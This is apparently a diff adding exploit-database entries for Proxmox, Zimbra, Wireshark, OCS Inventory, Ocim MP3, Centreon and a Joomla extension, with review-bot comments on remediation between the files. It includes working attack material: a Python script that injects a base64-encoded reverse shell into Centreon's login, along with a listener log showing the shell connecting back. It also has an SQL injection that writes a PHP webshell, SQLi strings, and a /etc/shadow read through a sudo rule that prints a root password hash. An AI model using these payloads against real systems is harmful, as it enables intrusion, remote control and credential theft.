"cpus": 1, + +"netif":"ifname=eth0,bridge=vmbr0"}) + if createvm.status_code == 200: + response = 
createvm.json() + if "success" in response and response["success"]: + print "[+] Stored XSS Created." + else: + print "[!] Error creating container..." + print response + else: + print "[!] Error creating Container. Bad HTTP Status +code : %d" % createvm.status_code + else: + print "[!] Authentication failed - Check the credentials..." + + if __name__ == "__main__": + print "[~] Proxmox VE 3/4b1 Stored Cross Site Scripting - +Nicolas Chatelain \n" + + parser = argparse.ArgumentParser() + parser.add_argument("--target", required=True, help="The target +host (eg : 10.0.0.1:8006)") + + parser.add_argument("--username", required=True) + parser.add_argument("--password", required=True) + + parser.add_argument("--vmid", required=False, default="999", +type=int, help="A unique ID for the container, exploit will fail if the +ID already exists.") + + parser.add_argument("--template", required=False, +default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz", + help="An existing template in the hypervisor +(default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)") + + parser.add_argument("--realm", required=False, default="pam", +choices=["pve", "pam"]) + + parser.add_argument("--version", default="3", choices=["3", +"4"], help="The Proxmox version to exploit") + + parser.add_argument("--hostname", required=True, help="The +target hostname") + + args = parser.parse_args() + + exploit(args.target, args.username, args.password, args.vmid, +args.template, args.realm, args.version, args.hostname) + +--------------- +Vulnerable code +--------------- + +The vulnerable code is located in the /usr/share/perl5/PVE/LXC.pm for +Proxmox 4. + +For Proxmox 3, the vulnerable code is located in +/usr/share/perl5/PVE/OpenVZ.pm. + +-------- +Solution +-------- + +Proxmox 4 : Update to pve-container 0.9-22 + +Proxmox 3 : Update to pve-manager 3.4-10 + +Timeline (dd/mm/yyyy) +===================== + +04/09/2015 : Initial discovery. +17/09/2015 : Contact with proxmox team. 
+18/09/2015 : Proxmox fixes the vulnerabilities. +18/09/2015 : Proxmox releases a new pve-container version (0.9-22) +18/09/2015 : Proxmox releases a new pve-manager version (3.4-10) + +Affected versions +================= + +* Proxmox VE 4 +* Proxmox VE 3 + + +Credits +======= + +* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com) \ No newline at end of file diff --git a/platforms/linux/webapps/39500.txt b/platforms/linux/webapps/39500.txt new file mode 100755 index 000000000..40b408a97 --- /dev/null +++ b/platforms/linux/webapps/39500.txt @@ -0,0 +1,79 @@ +====================================== +Multiple CSRF in Zimbra Mail interface +====================================== + + +CVE-2015-6541 + +Description +=========== + +Multiple CSRF vulnerabilities have been found in the Mail interface of +Zimbra 8.0.9 GA Release, enabling to change account +preferences like e-mail forwarding. + + +CSRF +==== + +Forms in the preferences part of old releases of Zimbra are vulnerable +to CSRF because of the lack of a CSRF token identifying a valid session. +As a consequence, requests can be forged and played arbitrarily. + +**Access Vector**: remote +**Security Risk**: low +**Vulnerability**: CWE-352 +**CVSS Base score**: 5.8 + +---------------- +Proof of Concept +---------------- + + + +
+ +
+ + + + + +Solution +======== + +Sensitive forms should be protected by a CSRF token. + + +Fixes +===== + +Fixed with 8.5 release : bug 83547 +(https://wiki.zimbra.com/wiki/Security/Collab/86#Notes_from_8.5) + + +Affected versions +================= + + * Zimbra <= 8.0.9 GA Release + + +Credits +======= + + * Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail +-dot- fr) + * Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com) \ No newline at end of file diff --git a/platforms/multiple/dos/39503.txt b/platforms/multiple/dos/39503.txt new file mode 100755 index 000000000..f8dfbc82b --- /dev/null +++ b/platforms/multiple/dos/39503.txt 
@@ -0,0 +1,105 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=651
+
+The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==14146==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a0 at pc 0x000000b2c8eb bp 0x7ffdfc45fa70 sp 0x7ffdfc45fa68
+READ of size 1 at 0x6070000003a0 thread T0
+ #0 0xb2c8ea in print_hex_data_buffer wireshark/epan/print.c:987:13
+ #1 0xb2bf43 in print_hex_data wireshark/epan/print.c:904:14
+ #2 0x5422e2 in print_packet wireshark/tshark.c:4155:10
+ #3 0x53cb2e in process_packet wireshark/tshark.c:3742:7
+ #4 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
+ #5 0x52c1df in main wireshark/tshark.c:2197:13
+
+0x6070000003a0 is located 0 bytes inside of 65-byte region [0x6070000003a0,0x6070000003e1)
+freed by thread T0 here:
+ #0 0x4d6ce0 in free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30
+ #1 0xc1fd8e in real_free wireshark/epan/tvbuff_real.c:47:3
+ #2 0xc2229c in tvb_free_internal wireshark/epan/tvbuff.c:110:3
+ #3 0xc22049 in tvb_free_chain wireshark/epan/tvbuff.c:135:3
+ #4 0xc21ed1 in tvb_free wireshark/epan/tvbuff.c:125:2
+ #5 0xbc972e in free_all_fragments wireshark/epan/reassemble.c:351:4
+ #6 0xbd40e5 in fragment_add_seq_common wireshark/epan/reassemble.c:1919:5
+ #7 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12
+ #8 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9
+ #9 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28
+ #10 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #11 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #12 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #13 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
+ #14 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #15 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #16 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
+ #17 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #18 0xadffde in dissect_record wireshark/epan/packet.c:501:3
+ #19 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
+ #20 0x53c91b in process_packet wireshark/tshark.c:3728:5
+ #21 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
+ #22 0x52c1df in main wireshark/tshark.c:2197:13
+
+previously allocated by thread T0 here:
+ #0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
+ #1 0x7ff6062f0610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
+ #2 0xbe1202 in fragment_add_seq_work wireshark/epan/reassemble.c:1793:2
+ #3 0xbd4181 in fragment_add_seq_common wireshark/epan/reassemble.c:1925:6
+ #4 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12
+ #5 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9
+ #6 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28
+ #7 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #8 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #9 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #10 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
+ #11 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #12 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #13 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
+ #14 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #15 0xadffde in dissect_record wireshark/epan/packet.c:501:3
+ #16 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
+ #17 0x53c91b in process_packet wireshark/tshark.c:3728:5
+ #18 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
+ #19 0x52c1df in main wireshark/tshark.c:2197:13
+
+SUMMARY: AddressSanitizer: heap-use-after-free wireshark/epan/print.c:987:13 in print_hex_data_buffer
+Shadow bytes around the buggy address:
+ 0x0c0e7fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c0e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c0e7fff8040: fa fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
+ 0x0c0e7fff8050: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd
+ 0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd
+=>0x0c0e7fff8070: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fa fa fa
+ 0x0c0e7fff8080: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa
+ 0x0c0e7fff8090: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fd fd
+ 0x0c0e7fff80a0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
+ 0x0c0e7fff80b0: fd fd fd fd fd fa fa fa fa fa 00 00 00 00 00 00
+ 0x0c0e7fff80c0: 00 00 06 fa fa fa fa fa 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==14146==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11799. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39503.zip
+
diff --git a/platforms/php/webapps/39458.txt b/platforms/php/webapps/39458.txt
new file mode 100755
index 000000000..98136f9eb
--- /dev/null
+++ b/platforms/php/webapps/39458.txt
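Review bot: The report cites Wireshark bug 11799 but gives no fixed version or fixing commit, so someone assessing exposure cannot tell which releases carry the fix; a line such as `Fixed in: <Wireshark version, per bug 11799>` next to the Bugzilla link would close that gap. As far as the ASAN trace shows, the 65-byte buffer is freed from `free_all_fragments` inside `fragment_add_seq_common` while `dissect_mux27010` runs, and is read later by `print_hex_data_buffer` from `print_packet`, i.e. the reassembly code releases a tvb that the packet-printing path still references. The summary line (`heap-use-after-free ... in print_hex_data_buffer`) therefore points at the reader, not the owner of the buffer; a sentence saying the lifetime problem is in the reassembly/dissector path would stop readers from looking for the bug in print.c.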
@@ -0,0 +1,37 @@
+# Exploit Title: OCS Inventory NG <= 2.2 - Search with various criteria SQL Injection and Code execution
+# Date: 17-02-2016
+# Exploit Author: Ephreet
+# Software Link: http://www.ocsinventory-ng.org/en/download/
+# Version: <=2.2
+# Category: webapps
+# Tested on: Debian 3.2.73-2+deb7u2 (MySQL 5.5.47-0+deb7u1, Apache/2.2.22), CentOS 6/7
+
+
+1. Description
+
+Custom search allows for SQL Injection, while default configuration allows for file write as MySQL user.
+Search field fails to escape MySQL special characters, allowing file creation and code execution.
+
+If permissions are not carefully set, one could write to web/crontab folders.
+
+Infrustructure note: this was tested on a single machine, but still applies to multiple servers environments, affecting the DB host.
+
+
+2. Proof of Concept
+
+At least a low priv user must be logged and access the search function on http:///ocsreports/index.php?function=visu_search
+
+- Time-based SQL Injection
+Choose a parameter, use EXACTLY operator:
+')) union select sleep(5); #
+
+- Code execution
+Bypass input escape and write to filesystem (webshell PoC):
+')) union select CONCAT(char(60),char(63),'php echo exec($_GET[',char(39),'cmd',char(39),']);',char(63),char(62)) into outfile '/usr/share/ocsinventory-reports/ocsreports/plugins/main_sections/conf/shell.php'; #
+
+
+3. Solution
+
+Run MySQL/Apache services as restricted user.
+Restrict file write permissions to ocs DB user.
+Watch out for weak permissions on /usr/share/ocsinventory-reports/ocsreports/plugins/main_sections/conf/ (it is often set to full write by inexperienced admins).
\ No newline at end of file
diff --git a/platforms/php/webapps/39498.txt b/platforms/php/webapps/39498.txt
new file mode 100755
index 000000000..41873879e
--- /dev/null
+++ b/platforms/php/webapps/39498.txt
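Review bot: In the Solution section, `Restrict file write permissions to ocs DB user` mixes up filesystem permissions with the database privilege the PoC actually depends on: the write happens through `SELECT ... INTO OUTFILE`, which requires the MySQL FILE privilege on the application's DB account and is blocked outright when `secure_file_priv` confines output to a directory outside the web root. Suggest stating both explicitly, e.g. `Revoke the FILE privilege from the ocs DB user and set secure_file_priv to a directory the web server does not serve.` The root cause (the search criteria value reaching the query unescaped) is described, but no fixed OCS Inventory version or vendor patch is referenced; if one exists it belongs in this section so readers do not rely on hardening alone.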
@@ -0,0 +1,32 @@
+========
+Ocim MP3 Plugin SQL Injection Vulnerability
+========
+
+:----------------------------------------------------------------------------------------------------:
+: # Exploit Title : Ocim MP3 Plugin SQL Injection Vulnerability
+: # Date : 26 February 2016
+: # Author : xevil and Blankon33
+: # Vendor Site: http://www.ocimscripts.com/
+: # Version:
+: # Vulnerability : SQL Injection
+: # Tested on : Wordpress 4.4.2
+: # Severity : High
+:----------------------------------------------------------------------------------------------------:
+
+Summary
+========
+Ocim MP3 is Plugin to make MP3 Grabber site based on Wordpress.
+
+Proof of Concept
+========
+Infected URL:
+http://[Site]/[Path]/wp-content/plugins/ocim-mp3/source/pages.php?id=['SQLi]
+
+
+Admin Panel:
+http://[Site]/[Path]/oc-login.php
+
+===========
+Thanks to
+===========
+All Indonesian Hacker!!!
diff --git a/platforms/php/webapps/39501.txt b/platforms/php/webapps/39501.txt
new file mode 100755
index 000000000..c6bc1ef5a
--- /dev/null
+++ b/platforms/php/webapps/39501.txt
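Review bot: The `: # Version:` field in the header is empty and no fixed release, vendor response or disclosure timeline is given, so readers cannot tell whether current Ocim MP3 builds are affected or whether the vendor was notified. State the plugin version actually tested and, if a fix exists, the first fixed release, e.g. `: # Version: <tested plugin version>`. Naming the `id` parameter's expected type in the Summary would also let readers verify the claim against the plugin source rather than the URL alone.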
@@ -0,0 +1,179 @@ +Unauthenticated Remote Command Execution in Centreon Web Interface +================================================================== + + +Description +=========== + +Centreon is a popular monitoring solution. + +A critical vulnerability has been found in the Centreon logging class +allowing remote users to execute arbitrary commands. + + +SQL injection leading to RCE +============================ + +Centreon logs SQL database errors in a log file using the "echo" system +command and the exec() PHP function. On the authentification class, +Centreon use htmlentities with the ENT_QUOTES options to filter SQL +entities. +However, Centreon doesn't filter the SQL escape character "\" and it is +possible to generate an SQL Error. +Because of the use of the "echo" system command with the PHP exec() +function, and because of the lack of sanitization, it is possible to +inject arbitrary system commands. + +**Access Vector**: remote + +**Security Risk**: high + +**Vulnerability**: CWE-78 + +---------------- +Proof of Concept +---------------- + +TCP Reverse Shell using python. + + #!/usr/bin/env python + import requests + import argparse + + def shell(target, reverseip, reverseport): + payload = 'import socket as a,subprocess as b,os as +c;s=a.socket(2,1);s.connect(("%s",%d));d=s.fileno();c.dup2(d,0);c.dup2(d,1);c.dup2(d,2);p=b.call(["sh"]);' +% (reverseip,reverseport) + print "[~] Starting reverseshell : %s - port : %d" % (reverseip, +reverseport) + req = requests.post(target, data={"useralias": "$(echo %s | +base64 -d | python)\\" % payload.encode("base64").replace("\n",""), +"password": "foo"}) + print "[+] DEAD !" 
+ + if __name__ == "__main__": + print "[~] Centreon Unauthentificated RCE - Nicolas Chatelain +" + parser = argparse.ArgumentParser() + parser.add_argument("--target", required=True) + parser.add_argument("--reverseip", required=True) + parser.add_argument("--reverseport", required=True, type=int) + args = parser.parse_args() + shell(args.target, args.reverseip, args.reverseport) + +Shell : + + nightlydev@nworkstation ~/Lab/Centreon $ python reverseshell.py +--target=http://172.16.138.137/centreon/index.php +--reverseip=172.16.138.1 --reverseport 8888 + [~] Centreon Unauthentificated RCE - Nicolas Chatelain + + [~] Starting reverseshell : 172.16.138.1 - port : 8888 + +# Other term + +nightlydev@nworkstation ~/Lab/Centreon $ nc -lvp 8888 +Ncat: Version 6.45 ( http://nmap.org/ncat ) +Ncat: Listening on :::8888 +Ncat: Listening on 0.0.0.0:8888 +Ncat: Connection from 172.16.138.135. +Ncat: Connection from 172.16.138.135:50050. +whoami +apache +groups +apache centreon-engine centreon-broker centreon nagios + + +--------------- +Vulnerable code +--------------- + +The vulnerable code is located in class/centreonLog.class.php, line 82 +and line 154: + + + /* + * print Error in log file. + */ + exec("echo \"".$string."\" >> ".$this->errorType[$id]); + +In class/centreonAuth.class.php, line 227: + + $DBRESULT = $this->pearDB->query("SELECT * FROM `contact` WHERE +`contact_alias` = '" . htmlentities($username, ENT_QUOTES, "UTF-8") . "' +AND `contact_activate` = '1' AND `contact_register` = '1' LIMIT 1"); + + +-------- +Solution +-------- + +Update to the Centreon 2.5.4 + + +Possible root password disclosure in centengine (Centreon Entreprise Server) +============================================================================ + +In some configurations, when centengine can run as root (with sudo). +It's possible to read some file content. 
+
+**Access Vector**: local
+
+**Security Risk**: high
+
+**Vulnerability**: CWE-209
+
+----------------
+Proof of Concept
+----------------
+
+ $ sudo /usr/sbin/centengine -v /etc/shadow
+ [1416391088] reading main config file
+ [1416391088] error while processing a config file: [/etc/shadow:1]
+bad variable name:
+'root:$6$3mvvEHQM3p3afuh4$DZ377daOy.8bn42t7ur82/Geplvsj90J7cs1xsgAbRZ0JDZ8KdB5CcQ0ucF5dwKpnBYLon1XBqjJPqpm6Zr5R0:16392:0:99999:7:::'
+ [1416391088]
+
+---------------
+Vulnerable code
+---------------
+
+In Centreon Entreprise Server (CES) : /etc/sudoers.d/centreon
+
+CENTREON ALL = NOPASSWD: /usr/sbin/centengine -v *
+
+--------
+Solution
+--------
+
+Do not allow centengine to be run as root or do not disclose the line
+that caused the error.
+
+Timeline (dd/mm/yyyy)
+=====================
+
+* 18/11/2014 : Initial discovery
+* 26/11/2014 : Contact with Centreon team
+* 27/11/2014 : Centreon correct vulnerabilities
+* 27/11/2014 : Centreon release version 2.5.4 that fixes vulnerabilities
+
+Fixes
+=====
+
+*
+https://github.com/centreon/centreon/commit/a6dd914418dd185a698050349e05f10438fde2a9
+*
+https://github.com/centreon/centreon/commit/d00f3e015d6cf64e45822629b00068116e90ae4d
+*
+https://github.com/centreon/centreon/commit/015e875482d7ff6016edcca27bffe765c2bd77c1
+
+Affected versions
+=================
+
+* Centreon <= 2.5.3
+
+
+Credits
+=======
+
+* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
\ No newline at end of file
diff --git a/platforms/php/webapps/39506.txt b/platforms/php/webapps/39506.txt
new file mode 100755
index 000000000..36fc36009
--- /dev/null
+++ b/platforms/php/webapps/39506.txt
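Review bot: The solution for the centengine issue, `Do not allow centengine to be run as root or do not disclose the line that caused the error`, does not tell an administrator what to change in the sudoers rule the advisory itself quotes; the wildcard in `CENTREON ALL = NOPASSWD: /usr/sbin/centengine -v *` is what lets an arbitrary path such as /etc/shadow be passed, so the concrete hardening is to pin the argument, e.g. `CENTREON ALL = NOPASSWD: /usr/sbin/centengine -v <path to centengine config>` (placeholder, substitute the real config path). For the first issue, the snippet `exec("echo \"".$string."\" >> ".$this->errorType[$id]);` is quoted without saying what the fixed version does differently; one sentence noting that the log line should be written with a file-write call rather than through a shell would help anyone verifying a backport. The three fix commits are listed, but not which of the two issues each addresses; labelling them would make cross-checking easier.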
@@ -0,0 +1,122 @@
+---------------------------------------------------------
+RatioSec Research Security Advisory RS-2016-001
+---------------------------------------------------------
+
+JSN PowerAdmin Joomla! Extension Remote Command Execution Via CSRF and
+XSS vulnerabilities
+---------------------------------------------------------
+
+Product: JSN PowerAdmin Joomla! Extension
+Vendor: JoomlaShine.com
+Tested Versions: 2.3.0
+Other Vulnerable Versions: Prior versions may also be affected
+Vendor Notification: 28th January, 2016
+Advisory Publication: 24th February, 2016
+CVE Reference: Pending
+RatioSec Advisory Reference: RS-2016-001
+Risk Level: High
+CVSSv3 Base Score: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
+
+---------------------------------------------------------
+
+RatioSec Research has discovered two cross-site request forgery and
+reflected cross-site scripting vulnerabilities in JSN PowerAdmin
+Joomla! Extension which can be exploited, respectively, to upload PHP
+files and run arbitrary HTML and script code in a user's browser
+session in context of the affected web site.
+
+1) The application allows users to perform certain actions via HTTP
+requests without performing proper checks to verify the requests
+validity. An authenticated user's browser can be forced to upload PHP
+files via the extension installer and subsequently execute arbitrary
+commands with the web server privileges by tricking the user into
+visiting a malicious web site.
+
+2) Input passed to `identified_name` GET parameter when `package` is
+set, `option` is set to `com_poweradmin`, `view` is set to
+`installer`, and `task` is set to `installer.install` in
+`/administrator/index.php` is not properly sanitised before being
+reflected. This can be exploited to run arbitrary HTML and script code
+in a user's browser session in context of the affected web site.
+
+---------------------------------------------------------
+
+Proof of Concept
+
+Read the advisory details on the RatioSec Research website for the
+proof of concept code.
+http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/
+
+----------------------------------------------------------
+
+Solution
+
+No official solution is currently available.
+
+----------------------------------------------------------
+
+Timeline
+
+- First contact: 27th January, 2016
+- Disclosure: 28th January, 2016. Preliminary date set to 10th, February 2016.
+- E-mail notice after no response: 02nd February, 2016
+- Advisory Publication: 24th February, 2016
+
+----------------------------------------------------------
+
+Advisory URL
+
+http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/
+
+RatioSec Research
+
+Mail: research at ratiosec dot com
+Web: http://www.ratiosec.com/
+Twitter: https://twitter.com/ratio_sec
+
+
+
+----------------
+Proof Of Concept
+
+1) The following HTML page exploits the cross-site request forgery vulnerability and uploads a malicious PHP script system($_GET['cmd']); as /tmp/bd.phtml if visited by a logged-in administrator.
+
+
+
+
+
+
+
+
+
+The file extension .phtml and the tags are used here to fool the Joomla API JFile::upload() file validation checks. As result, the backdoor is installed permanently as /tmp/bd.phtml which can be used lately by the attacker to obtain the full system compromise.
+
+Command Execution
+
+2) The following URL exploits the cross-site scripting vulnerability to execute javascript code in a logged-in administrator’s browser.
+
+http://localhost/joomla/administrator/index.php?package=foobar&option=com_poweradmin&view=installer&task=installer.install&identified_name=
\ No newline at end of file
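Review bot: `No official solution is currently available` leaves administrators without an interim mitigation even though the advisory's own description supports one: both issues require a logged-in administrator session on `/administrator/index.php`, so restricting who can reach the `/administrator/` path (network allow-list or an extra authentication layer) and not browsing untrusted sites while logged in reduces the CSRF exposure until a fix ships. Since the upload check is described as fooled by the `.phtml` extension, it is also worth stating that administrators should confirm their web server does not execute `.phtml` as PHP, which would leave an uploaded file inert. The XSS URL ends at `identified_name=` with no value, presumably stripped from the text; a note that the value is intentionally omitted would stop readers from taking the URL as complete.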